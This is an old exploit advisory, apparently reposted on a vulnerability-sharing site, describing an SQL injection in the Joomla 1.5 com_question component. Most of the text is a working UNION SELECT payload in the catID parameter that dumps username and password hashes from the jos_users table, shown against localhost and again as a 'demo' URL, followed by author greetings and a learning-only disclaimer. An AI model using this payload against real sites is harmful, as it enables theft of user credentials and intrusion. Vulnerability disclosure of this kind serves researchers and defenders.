################################################### # |Title : Joomla (com_question) SQL Injection Vulnerability # |Vendor : http://www.alex-ensdorf.de/ # |Version : Joomla 1.5 # |Date : 15/5/2011 # |Author : NeX HaCkEr # |Contact : Error_log@hotmail.com ################################################## # | Exploit : # | http://localhost/Joomla/index.php/?option=com_question&catID=[SQL] # | http://localhost/Joomla/index.php/?option=com_question&catID=21' and+1=0 union all # | select 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 ################################################## # | Demo: # | http://site.com/index.php/?option=com_question&catID=21' and+1=0 union all select # | 1,2,3,4,5,6,concat(username,0x3a,password),8,9 from jos_users--%20 ################################################## # | Greetz : # | Dr.KAsBeR & DaShEr & MaFiA & WeeD ##################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论